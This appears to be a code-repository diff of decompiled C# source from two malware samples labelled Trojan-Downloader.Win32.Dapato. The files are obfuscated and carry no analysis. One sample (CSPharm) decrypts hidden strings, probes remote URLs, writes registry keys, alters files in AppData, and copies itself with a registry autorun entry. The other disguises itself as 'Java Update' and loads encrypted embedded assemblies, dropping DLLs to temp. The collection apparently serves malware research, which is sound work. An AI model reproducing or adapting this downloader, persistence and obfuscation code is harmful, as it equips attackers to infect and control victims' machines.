while (\u0003.\u0001.\u0001(obj2) || obj2.\u0011.\u0003 > 0 && obj2.\u0005 != 11);
goto label_3;
label_1:
return num1;
label_3:
return num1;
}
static void \u0001()
{
try
{
if (Environment.OSVersion.Platform != PlatformID.Win32NT)
return;
MemoryManager.\u0001 = new MemoryManager();
}
catch
{
}
}
static int \u0001([In] \u0005.\u0003.\u0003 obj0, [In] \u0005.\u0003.\u0002 obj1, [In] int obj2)
{
obj2 = Math.Min(Math.Min(obj2, 32768 - obj0.\u0003), \u0003.\u0001.\u0001(obj1));
int num1 = 32768 - obj0.\u0002;
int num2;
if (obj2 > num1)
{
num2 = \u0003.\u0001.\u0001(obj1, obj0.\u0001, obj0.\u0002, num1);
if (num2 == num1)
num2 += \u0003.\u0001.\u0001(obj1, obj0.\u0001, 0, obj2 - num1);
}
else
num2 = \u0003.\u0001.\u0001(obj1, obj0.\u0001, obj0.\u0002, obj2);
obj0.\u0002 = obj0.\u0002 + num2 & (int) short.MaxValue;
obj0.\u0003 += num2;
return num2;
}
static int \u0001([In] \u0005.\u0003.\u0003 obj0) => 32768 - obj0.\u0003;
static bool \u0001([In] \u0005.\u0003.\u0001 obj0)
{
switch (obj0.\u0005)
{
case 2:
if (obj0.\u000F)
{
obj0.\u0005 = 12;
return false;
}
int num1 = \u0003.\u0001.\u0001(obj0.\u0010, 3);
if (num1 < 0)
return false;
\u0003.\u0001.\u0001(obj0.\u0010, 3);
if ((num1 & 1) != 0)
obj0.\u000F = true;
switch (num1 >> 1)
{
case 0:
\u0003.\u0001.\u0001(obj0.\u0010);
obj0.\u0005 = 3;
break;
case 1:
obj0.\u0013 = \u0005.\u0003.\u0004.\u0002;
obj0.\u0014 = \u0005.\u0003.\u0004.\u0003;
obj0.\u0005 = 7;
break;
case 2:
obj0.\u0012 = new \u0005.\u0003.\u0005();
obj0.\u0005 = 6;
break;
}
return true;
case 3:
if ((obj0.\u000E = \u0003.\u0001.\u0001(obj0.\u0010, 16)) < 0)
return false;
\u0003.\u0001.\u0001(obj0.\u0010, 16);
obj0.\u0005 = 4;
goto case 4;
case 4:
if (\u0003.\u0001.\u0001(obj0.\u0010, 16) < 0)
return false;
\u0003.\u0001.\u0001(obj0.\u0010, 16);
obj0.\u0005 = 5;
goto case 5;
case 5:
int num2 = \u0003.\u0001.\u0001(obj0.\u0011, obj0.\u0010, obj0.\u000E);
obj0.\u000E -= num2;
if (obj0.\u000E != 0)
return !\u0003.\u0001.\u0001(obj0.\u0010);
obj0.\u0005 = 2;
return true;
case 6:
if (!\u0003.\u0001.\u0001(obj0.\u0012, obj0.\u0010))
return false;
obj0.\u0013 = \u0003.\u0001.\u0001(obj0.\u0012);
obj0.\u0014 = \u0003.\u0001.\u0001(obj0.\u0012);
obj0.\u0005 = 7;
goto case 7;
case 7:
case 8:
case 9:
case 10:
return \u0003.\u0001.\u0001(obj0);
case 12:
return false;
default:
return false;
}
}
static int \u0001([In] \u0005.\u0003.\u0007 obj0) => obj0.ReadByte() | obj0.ReadByte() << 8;
static void \u0001([In] \u0005.\u0003.\u0003 obj0, [In] int obj1, [In] int obj2, [In] int obj3)
{
while (obj2-- > 0)
{
byte[] numArray = obj0.\u0001;
\u0005.\u0003.\u0003 obj = obj0;
int num1;
int num2 = num1 = obj.\u0002;
obj.\u0002 = num1 + 1;
int index = num2;
int num3 = (int) obj0.\u0001[obj1++];
numArray[index] = (byte) num3;
obj0.\u0002 &= (int) short.MaxValue;
obj1 &= (int) short.MaxValue;
}
}
static int \u0001([In] \u0005.\u0003.\u0007 obj0) => \u0003.\u0001.\u0001(obj0) | \u0003.\u0001.\u0001(obj0) << 16;
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd/_0004/_0001.cs
+116
View File
@@ -0,0 +1,116 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using \u0003;
using \u0004;
using \u0005;
using Microsoft.Win32;
using System;
using System.IO;
using System.Net;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
namespace \u0004
{
internal sealed class \u0001
{
private static bool \u0001 = true;
private static string[] \u0002 = new string[5]
{
\u0001.\u0001(860),
\u0001.\u0001(941),
\u0001.\u0001(1010),
\u0001.\u0001(1087),
\u0001.\u0001(1172)
};
private static string \u0003 = \u0001.\u0001(1249);
internal static bool \u0004 = false;
private static bool \u0005 = false;
private static void \u0001([In] string[] obj0)
{
\u0001.\u0001();
if (\u0001.\u0001)
;
if (false)
return;
\u0001.\u0001(2);
\u0001.\u0001(\u0001.\u0001(54));
string str1 = \u0001.\u0001(95);
\u0001.\u0001(\u0001.\u0001(96));
for (int index = 0; index < \u0001.\u0002.Length; ++index)
{
\u0001.\u0001(\u0001.\u0001(141) + \u0001.\u0002[index]);
HttpWebRequest httpWebRequest = (HttpWebRequest) WebRequest.Create(new Uri(\u0001.\u0002[index]));
try
{
HttpWebResponse response = (HttpWebResponse) httpWebRequest.GetResponse();
if (response == null || response.StatusCode != HttpStatusCode.OK)
{
\u0001.\u0001(\u0001.\u0002[index] + \u0001.\u0001(154));
}
else
{
\u0001.\u0001(\u0001.\u0002[index] + \u0001.\u0001(199));
str1 = \u0001.\u0002[index];
break;
}
}
catch (Exception ex)
{
\u0001.\u0001(\u0001.\u0002[index] + \u0001.\u0001(212));
}
}
\u0001.\u0001(20);
\u0001.\u0001(\u0001.\u0001(257));
RegistryKey registryKey = Registry.CurrentUser.OpenSubKey(\u0001.\u0001(330), true);
registryKey.SetValue(\u0001.\u0001(411), (object) 1, RegistryValueKind.DWord);
registryKey.SetValue(\u0001.\u0001(428), (object) 1, RegistryValueKind.DWord);
registryKey.SetValue(\u0001.\u0001(449), (object) str1, RegistryValueKind.String);
registryKey.Close();
\u0001.\u0001(\u0001.\u0001(470));
string path = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0001.\u0001(503);
\u0001.\u0001(\u0001.\u0001(540) + path);
string searchPattern = \u0001.\u0001(561);
\u0001.\u0001(10);
foreach (string directory in Directory.GetDirectories(path, searchPattern))
{
\u0001.\u0001(\u0001.\u0001(574) + directory);
if (System.IO.File.Exists(directory + \u0001.\u0001(607)))
{
\u0001.\u0001(\u0001.\u0001(620));
\u0001.\u0001(\u0001.\u0001(641));
StringBuilder stringBuilder = new StringBuilder();
foreach (string readAllLine in System.IO.File.ReadAllLines(directory + \u0001.\u0001(607)))
{
for (int index = 0; index < 5; ++index)
{
if (readAllLine.Contains(\u0001.\u0001(654) + index.ToString() + \u0001.\u0001(699)))
readAllLine.Replace(\u0001.\u0001(654) + index.ToString() + \u0001.\u0001(699), \u0001.\u0001(704));
}
stringBuilder.AppendLine(readAllLine);
}
stringBuilder.AppendLine(\u0001.\u0001(704));
System.IO.File.WriteAllText(directory + \u0001.\u0001(607), stringBuilder.ToString());
}
}
if (\u0001.\u0005)
{
string str2 = Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData) + \u0001.\u0001(753);
if (!System.IO.File.Exists(str2))
{
Registry.CurrentUser.OpenSubKey(\u0001.\u0001(778), true).SetValue(\u0001.\u0001(839), (object) str2);
System.IO.File.Copy(Assembly.GetExecutingAssembly().Location, str2);
\u0001.\u0001(\u0001.\u0003);
}
}
else
\u0001.\u0001(\u0001.\u0003);
}
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd/_0004/_0002.cs
+34
View File
@@ -0,0 +1,34 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using \u0003;
using System;
using System.IO;
using System.Reflection;
namespace \u0004
{
internal sealed class \u0002 : IDisposable
{
internal readonly Type \u0001;
internal readonly object \u0002;
public \u0002()
{
try
{
this.\u0001 = Assembly.Load("System.Core, Version=2.0.5.0, Culture=neutral, PublicKeyToken=7cec85d7bea7798e").GetType("System.Security.Cryptography.AesManaged");
}
catch (FileNotFoundException ex)
{
this.\u0001 = Assembly.Load("mscorlib").GetType("System.Security.Cryptography.RijndaelManaged");
}
this.\u0002 = Activator.CreateInstance(this.\u0001);
}
public void \u0001() => \u0001.\u0001(this);
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd/_0005/_0001.cs
+114
View File
@@ -0,0 +1,114 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using \u0002;
using \u0003;
using \u0005;
using System;
using System.Collections;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
namespace \u0005
{
internal sealed class \u0001
{
private static readonly string \u0001 = "0";
private static readonly string \u0002 = "54";
private static readonly byte[] \u0003 = (byte[]) null;
private static readonly Hashtable \u0004 = (Hashtable) null;
private static readonly bool \u0005 = false;
private static readonly int \u0006 = 0;
[\u0001]
[\u0005.\u0002]
public static string \u0001([In] int obj0)
{
obj0 -= \u0001.\u0006;
if (\u0001.\u0005)
{
string str = (string) \u0001.\u0004[(object) obj0];
if (str != null)
return str;
}
int num1 = obj0;
byte[] numArray1 = \u0001.\u0003;
int index1 = num1;
int index2 = index1 + 1;
int num2 = (int) numArray1[index1];
int count;
if ((num2 & 128) == 0)
{
count = num2;
if (count == 0)
return string.Empty;
}
else if ((num2 & 64) == 0)
{
count = ((num2 & 63) << 8) + (int) \u0001.\u0003[index2++];
}
else
{
int num3 = (num2 & 31) << 24;
byte[] numArray2 = \u0001.\u0003;
int index3 = index2;
int num4 = index3 + 1;
int num5 = (int) numArray2[index3] << 16;
int num6 = num3 + num5;
byte[] numArray3 = \u0001.\u0003;
int index4 = num4;
int num7 = index4 + 1;
int num8 = (int) numArray3[index4] << 8;
int num9 = num6 + num8;
byte[] numArray4 = \u0001.\u0003;
int index5 = num7;
index2 = index5 + 1;
int num10 = (int) numArray4[index5];
count = num9 + num10;
}
try
{
byte[] bytes = Convert.FromBase64String(Encoding.UTF8.GetString(\u0001.\u0003, index2, count));
string str = string.Intern(Encoding.UTF8.GetString(bytes, 0, bytes.Length));
if (\u0001.\u0005)
{
try
{
\u0001.\u0004.Add((object) obj0, (object) str);
}
catch
{
}
}
return str;
}
catch
{
return (string) null;
}
}
static \u0001()
{
if (\u0001.\u0001 == "1")
{
\u0001.\u0005 = true;
\u0001.\u0004 = new Hashtable();
}
\u0001.\u0006 = Convert.ToInt32(\u0001.\u0002);
using (Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream("{1e4f9d46-a55d-4bde-840e-075123ccac58}"))
{
int int32 = Convert.ToInt32(manifestResourceStream.Length);
byte[] buffer = new byte[int32];
manifestResourceStream.Read(buffer, 0, int32);
\u0001.\u0003 = \u0001.\u0001(buffer);
manifestResourceStream.Close();
}
}
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd/_0005/_0002.cs
+14
View File
@@ -0,0 +1,14 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using System;
namespace \u0005
{
internal sealed class \u0002 : Attribute
{
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd/_0005/_0003.cs
+342
View File
@@ -0,0 +1,342 @@
// Decompiled with JetBrains decompiler
// Type: .
// Assembly: CSPharm, Version=1.0.0.0, Culture=neutral, PublicKeyToken=91f7ba0f4234404d
// MVID: E3EED34E-DEA0-448A-9147-166831419ACC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00002-msil\Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd.exe
using \u0003;
using System;
using System.IO;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;
namespace \u0005
{
internal sealed class \u0003
{
internal sealed class \u0001
{
internal static readonly int[] \u0001 = new int[29]
{
3,
4,
5,
6,
7,
8,
9,
10,
11,
13,
15,
17,
19,
23,
27,
31,
35,
43,
51,
59,
67,
83,
99,
115,
131,
163,
195,
227,
258
};
internal static readonly int[] \u0002 = new int[29]
{
0,
0,
0,
0,
0,
0,
0,
0,
1,
1,
1,
1,
2,
2,
2,
2,
3,
3,
3,
3,
4,
4,
4,
4,
5,
5,
5,
5,
0
};
internal static readonly int[] \u0003 = new int[30]
{
1,
2,
3,
4,
5,
7,
9,
13,
17,
25,
33,
49,
65,
97,
129,
193,
257,
385,
513,
769,
1025,
1537,
2049,
3073,
4097,
6145,
8193,
12289,
16385,
24577
};
internal static readonly int[] \u0004 = new int[30]
{
0,
0,
0,
0,
1,
1,
2,
2,
3,
3,
4,
4,
5,
5,
6,
6,
7,
7,
8,
8,
9,
9,
10,
10,
11,
11,
12,
12,
13,
13
};
internal int \u0005;
internal int \u0006;
internal int \u0007;
internal int \u0008;
internal int \u000E;
internal bool \u000F;
internal \u0005.\u0003.\u0002 \u0010;
internal \u0005.\u0003.\u0003 \u0011;
internal \u0005.\u0003.\u0005 \u0012;
internal \u0005.\u0003.\u0004 \u0013;
internal \u0005.\u0003.\u0004 \u0014;
public \u0001([In] byte[] obj0)
{
this.\u0010 = new \u0005.\u0003.\u0002();
this.\u0011 = new \u0005.\u0003.\u0003();
this.\u0005 = 2;
\u0001.\u0001(obj0.Length, 0, obj0, this.\u0010);
}
}
internal sealed class \u0002
{
internal byte[] \u0001;
internal int \u0002 = 0;
internal int \u0003 = 0;
internal uint \u0004 = 0;
internal int \u0005 = 0;
}
internal sealed class \u0003
{
internal byte[] \u0001 = new byte[32768];
internal int \u0002 = 0;
internal int \u0003 = 0;
}
internal sealed class \u0004
{
internal short[] \u0001;
public static readonly \u0005.\u0003.\u0004 \u0002;
public static readonly \u0005.\u0003.\u0004 \u0003;
static \u0004()
{
byte[] numArray1 = new byte[288];
int num1 = 0;
while (num1 < 144)
numArray1[num1++] = (byte) 8;
while (num1 < 256)
numArray1[num1++] = (byte) 9;
while (num1 < 280)
numArray1[num1++] = (byte) 7;
while (num1 < 288)
numArray1[num1++] = (byte) 8;
\u0005.\u0003.\u0004.\u0002 = new \u0005.\u0003.\u0004(numArray1);
byte[] numArray2 = new byte[32];
int num2 = 0;
while (num2 < 32)
numArray2[num2++] = (byte) 5;
\u0005.\u0003.\u0004.\u0003 = new \u0005.\u0003.\u0004(numArray2);
}
public \u0004([In] byte[] obj0) => \u0001.\u0001(obj0, this);
}
internal sealed class \u0005
{
internal static readonly int[] \u0001 = new int[3]
{
3,
3,
11
};
internal static readonly int[] \u0002 = new int[3]
{
2,
3,
7
};
internal byte[] \u0003;
internal byte[] \u0004;
internal \u0005.\u0003.\u0004 \u0005;
internal int \u0006;
internal int \u0007;
internal int \u0008;
internal int \u000E;
internal int \u000F;
internal int \u0010;
internal byte \u0011;
internal int \u0012;
internal static readonly int[] \u0013;
static \u0005()
{
int[] numArray = new int[19];
// ISSUE: field reference
RuntimeFieldHandle fldHandle = __fieldref (\u0002.\u0002.\u0010);
if (true)
goto label_2;
label_1:
\u0005.\u0003.\u0005.\u0013 = numArray;
return;
label_2:
RuntimeHelpers.InitializeArray((Array) numArray, fldHandle);
goto label_1;
}
}
internal sealed class \u0006
{
private static readonly int[] \u0001 = new int[19]
{
16,
17,
18,
0,
8,
7,
9,
6,
10,
5,
11,
4,
12,
3,
13,
2,
14,
1,
15
};
internal static readonly byte[] \u0002 = new byte[16]
{
(byte) 0,
(byte) 8,
(byte) 4,
(byte) 12,
(byte) 2,
(byte) 10,
(byte) 6,
(byte) 14,
(byte) 1,
(byte) 9,
(byte) 5,
(byte) 13,
(byte) 3,
(byte) 11,
(byte) 7,
(byte) 15
};
private static readonly short[] \u0003 = new short[286];
private static readonly byte[] \u0004 = new byte[286];
private static readonly short[] \u0005;
private static readonly byte[] \u0006;
static \u0006()
{
if (true)
goto label_13;
label_2:
int index1;
for (; index1 < 144; \u0005.\u0003.\u0006.\u0004[index1++] = (byte) 8)
\u0005.\u0003.\u0006.\u0003[index1] = \u0001.\u0001(48 + index1 << 8);
for (; index1 < 256; \u0005.\u0003.\u0006.\u0004[index1++] = (byte) 9)
\u0005.\u0003.\u0006.\u0003[index1] = \u0001.\u0001(256 + index1 << 7);
for (; index1 < 280; \u0005.\u0003.\u0006.\u0004[index1++] = (byte) 7)
\u0005.\u0003.\u0006.\u0003[index1] = \u0001.\u0001(index1 - 256 << 9);
for (; index1 < 286; \u0005.\u0003.\u0006.\u0004[index1++] = (byte) 8)
\u0005.\u0003.\u0006.\u0003[index1] = \u0001.\u0001(index1 - 88 << 8);
\u0005.\u0003.\u0006.\u0005 = new short[30];
\u0005.\u0003.\u0006.\u0006 = new byte[30];
for (int index2 = 0; index2 < 30; ++index2)
{
\u0005.\u0003.\u0006.\u0005[index2] = \u0001.\u0001(index2 << 11);
\u0005.\u0003.\u0006.\u0006[index2] = (byte) 5;
}
return;
label_13:
index1 = 0;
goto label_2;
}
}
internal sealed class \u0007 : MemoryStream
{
public \u0007([In] byte[] obj0)
: base(obj0, false)
{
}
}
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnd-7f2f48002f973886553b938cc98149108eb2e39f2ac47324d3c731a4208c60fd/{1e4f9d46-a55d-4bde-840e-075123ccac58}
+1
View File
@@ -0,0 +1 @@
{z}Ì«^­k–v¶ð[ƒ`Gø‚*¢ßQSÏÏ°¶³¾û@ð–@…û¢BÏ<ùñ ­ž-ÀA‹uÁ4ŒK«Ÿ¨éh§8¥ Wÿ“y;ŠÇÍ¿œv$˜2¾0½…I*ïËlî¶ÇwÑ1ú§î&õ.z?̧U¬´„53–UÊN Jø˜ŸÝz‰ìÐwÓ&JB宫˱–‘
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/AssemblyInfo.cs
+16
View File
@@ -0,0 +1,16 @@
using SmartAssembly.Attributes;
using System.Reflection;
using System.Runtime.InteropServices;
[assembly: AssemblyCompany("")]
[assembly: AssemblyProduct("Java Update")]
[assembly: AssemblyCopyright("Copyright © 2012")]
[assembly: AssemblyTitle("Java Update")]
[assembly: AssemblyDescription("")]
[assembly: AssemblyConfiguration("")]
[assembly: ComVisible(false)]
[assembly: AssemblyTrademark("")]
[assembly: Guid("3b4a5c85-91c9-4b3b-88d3-14814dd76514")]
[assembly: AssemblyFileVersion("1.0.0.0")]
[assembly: PoweredBy("Powered by SmartAssembly 6.6.1.31")]
[assembly: AssemblyVersion("1.0.0.0")]
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/Java/Properties/Resources.cs
+46
View File
@@ -0,0 +1,46 @@
// Decompiled with JetBrains decompiler
// Type: Java.Properties.Resources
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System.CodeDom.Compiler;
using System.ComponentModel;
using System.Diagnostics;
using System.Globalization;
using System.Resources;
using System.Runtime.CompilerServices;
namespace Java.Properties
{
[GeneratedCode("System.Resources.Tools.StronglyTypedResourceBuilder", "4.0.0.0")]
[CompilerGenerated]
[DebuggerNonUserCode]
internal sealed class Resources
{
private static ResourceManager resourceMan;
private static CultureInfo resourceCulture;
internal Resources()
{
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static ResourceManager ResourceManager
{
get
{
if (object.ReferenceEquals((object) Java.Properties.Resources.resourceMan, (object) null))
Java.Properties.Resources.resourceMan = new ResourceManager("Java.Properties.Resources", typeof (Java.Properties.Resources).Assembly);
return Java.Properties.Resources.resourceMan;
}
}
[EditorBrowsable(EditorBrowsableState.Advanced)]
internal static CultureInfo Culture
{
get => Java.Properties.Resources.resourceCulture;
set => Java.Properties.Resources.resourceCulture = value;
}
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/Java/Properties/Settings.cs
+21
View File
@@ -0,0 +1,21 @@
// Decompiled with JetBrains decompiler
// Type: Java.Properties.Settings
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System.CodeDom.Compiler;
using System.Configuration;
using System.Runtime.CompilerServices;
namespace Java.Properties
{
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "10.0.0.0")]
[CompilerGenerated]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = (Settings) SettingsBase.Synchronized((SettingsBase) new Settings());
public static Settings Default => Settings.defaultInstance;
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/SmartAssembly/AssemblyResolver/AssemblyResolver.cs
+24
View File
@@ -0,0 +1,24 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.AssemblyResolver.AssemblyResolver
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using System;
namespace SmartAssembly.AssemblyResolver
{
public sealed class AssemblyResolver
{
public static void AttachApp()
{
try
{
AssemblyResolverHelper.Attach();
}
catch (Exception ex)
{
}
}
}
}
MSIL/Trojan-Downloader/Win32/D/Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd/SmartAssembly/AssemblyResolver/AssemblyResolverHelper.cs
+206
View File
@@ -0,0 +1,206 @@
// Decompiled with JetBrains decompiler
// Type: SmartAssembly.AssemblyResolver.AssemblyResolverHelper
// Assembly: Java Update, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: 9303C6B7-A9B1-42D1-950C-FCE2C64C3FE0
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare.00004-msil\Trojan-Downloader.Win32.Dapato.lnz-b8c384980c9f22185c34463ff696eecea0ea8f5afe9bfe8909d6e74753ffabcd.exe
using SmartAssembly.Zip;
using System;
using System.Collections;
using System.Diagnostics;
using System.IO;
using System.Reflection;
using System.Runtime.InteropServices;
using System.Text;
namespace SmartAssembly.AssemblyResolver
{
internal sealed class AssemblyResolverHelper
{
internal const string BindList = "{71461f04-2faa-4bb9-a0dd-28a79101b599}";
private const int MOVEFILE_DELAY_UNTIL_REBOOT = 4;
private static Hashtable hashtable = new Hashtable();
[DllImport("kernel32")]
private static extern bool MoveFileEx(string existingFileName, string newFileName, int flags);
internal static bool IsWebApplication
{
get
{
try
{
string lower = Process.GetCurrentProcess().MainModule.ModuleName.ToLower();
if (lower == "w3wp.exe")
return true;
if (lower == "aspnet_wp.exe")
return true;
}
catch
{
}
return false;
}
}
internal static void Attach()
{
try
{
AppDomain.CurrentDomain.AssemblyResolve += new ResolveEventHandler(AssemblyResolverHelper.ResolveAssembly);
}
catch
{
}
}
internal static Assembly ResolveAssembly(object sender, ResolveEventArgs e)
{
AssemblyResolverHelper.AssemblyInfo assemblyInfo = new AssemblyResolverHelper.AssemblyInfo(e.Name);
string base64String1 = Convert.ToBase64String(Encoding.UTF8.GetBytes(assemblyInfo.GetAssemblyFullName(false)));
string[] strArray = "ezA0ZDI2OWViLTIxZjAtNDMxMy04ODY1LTkzZjFjMWU2OWU5Yn0sIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49M2U1NjM1MDY5M2Y3MzU1ZQ==,[z]{56ab1832-9ffe-43ad-8f8b-23253f3aef61},ezA0ZDI2OWViLTIxZjAtNDMxMy04ODY1LTkzZjFjMWU2OWU5Yn0=,[z]{56ab1832-9ffe-43ad-8f8b-23253f3aef61}".Split(',');
string str1 = string.Empty;
bool flag1 = false;
bool flag2 = false;
for (int index = 0; index < strArray.Length - 1; index += 2)
{
if (strArray[index] == base64String1)
{
str1 = strArray[index + 1];
break;
}
}
if (str1.Length == 0 && assemblyInfo.PublicKeyToken.Length == 0)
{
string base64String2 = Convert.ToBase64String(Encoding.UTF8.GetBytes(assemblyInfo.Name));
for (int index = 0; index < strArray.Length - 1; index += 2)
{
if (strArray[index] == base64String2)
{
str1 = strArray[index + 1];
break;
}
}
}
if (str1.Length > 0)
{
if (str1[0] == '[')
{
int num = str1.IndexOf(']');
string str2 = str1.Substring(1, num - 1);
flag1 = str2.IndexOf('z') >= 0;
flag2 = str2.IndexOf('t') >= 0;
str1 = str1.Substring(num + 1);
}
lock (AssemblyResolverHelper.hashtable)
{
if (AssemblyResolverHelper.hashtable.ContainsKey((object) str1))
return (Assembly) AssemblyResolverHelper.hashtable[(object) str1];
Stream manifestResourceStream = Assembly.GetExecutingAssembly().GetManifestResourceStream(str1);
if (manifestResourceStream != null)
{
int length = (int) manifestResourceStream.Length;
byte[] numArray = new byte[length];
manifestResourceStream.Read(numArray, 0, length);
if (flag1)
numArray = SimpleZip.Unzip(numArray);
Assembly assembly = (Assembly) null;
if (!flag2)
{
try
{
assembly = Assembly.Load(numArray);
}
catch (FileLoadException ex)
{
flag2 = true;
}
catch (BadImageFormatException ex)
{
flag2 = true;
}
}
if (flag2)
{
try
{
string str3 = string.Format("{0}{1}\\", (object) Path.GetTempPath(), (object) str1);
Directory.CreateDirectory(str3);
string str4 = str3 + assemblyInfo.Name + ".dll";
if (!File.Exists(str4))
{
FileStream fileStream = File.OpenWrite(str4);
fileStream.Write(numArray, 0, numArray.Length);
fileStream.Close();
AssemblyResolverHelper.MoveFileEx(str4, (string) null, 4);
AssemblyResolverHelper.MoveFileEx(str3, (string) null, 4);
}
assembly = Assembly.LoadFile(str4);
}
catch
{
}
}
AssemblyResolverHelper.hashtable[(object) str1] = (object) assembly;
return assembly;
}
}
}
return (Assembly) null;
}
internal struct AssemblyInfo
{
public string Name;
public Version Version;
public string Culture;
public string PublicKeyToken;
public string GetAssemblyFullName(bool includeVersion)
{
StringBuilder stringBuilder = new StringBuilder();
stringBuilder.Append(this.Name);
if (includeVersion && this.Version != (Version) null)
{
stringBuilder.Append(", Version=");
stringBuilder.Append((object) this.Version);
}
stringBuilder.Append(", Culture=");
stringBuilder.Append(this.Culture.Length == 0 ? "neutral" : this.Culture);
stringBuilder.Append(", PublicKeyToken=");
stringBuilder.Append(this.PublicKeyToken.Length == 0 ? "null" : this.PublicKeyToken);
return stringBuilder.ToString();
}
public AssemblyInfo(string assemblyFullName)
{
this.Version = (Version) null;
this.Culture = string.Empty;
this.PublicKeyToken = string.Empty;
this.Name = string.Empty;
string str1 = assemblyFullName;
char[] chArray = new char[1]{ ',' };
foreach (string str2 in str1.Split(chArray))
{
string str3 = str2.Trim();
if (str3.StartsWith("Version="))
this.Version = new Version(str3.Substring(8));
else if (str3.StartsWith("Culture="))
{
this.Culture = str3.Substring(8);
if (this.Culture == "neutral")
this.Culture = string.Empty;
}
else if (str3.StartsWith("PublicKeyToken="))
{
this.PublicKeyToken = str3.Substring(15);
if (this.PublicKeyToken == "null")
this.PublicKeyToken = string.Empty;
}
else
this.Name = str3;
}
}
}
}
}
